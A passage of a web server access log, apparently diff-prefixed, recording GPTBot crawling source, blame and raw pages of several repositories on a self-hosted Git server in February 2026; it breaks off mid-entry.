+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" +[17/Feb/2026:14:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15930] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16943] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14325] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14326] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15931] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16940] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14588] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14586] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14588] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10202] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" +[17/Feb/2026:14:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13610] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:14:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 10823] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" +[17/Feb/2026:14:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 17039] [Gzip 8.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 17005] [Gzip 8.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13130] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12325] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" +[17/Feb/2026:14:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13078] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" +[17/Feb/2026:14:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12294] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" +[17/Feb/2026:14:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13048] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13098] [Gzip 6.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:14:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 14487] [Gzip 7.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:14:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 242842] [Gzip 11.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:14:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 70274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:14:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 74.7.227.38] [Length 9860] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" +[17/Feb/2026:14:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11664] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12857] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13065] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12825] [Gzip 6.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11634] [Gzip 4.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" +[17/Feb/2026:14:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9852] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" +[17/Feb/2026:14:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 74.7.227.38] [Length 9845] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" +[17/Feb/2026:14:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13690] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15573] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" +[17/Feb/2026:14:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13957] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" +[17/Feb/2026:14:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14229] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" +[17/Feb/2026:14:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16501] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" +[17/Feb/2026:14:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14841] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" +[17/Feb/2026:14:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode" +[17/Feb/2026:14:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10403] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode" +[17/Feb/2026:14:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode" +[17/Feb/2026:14:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" [Client 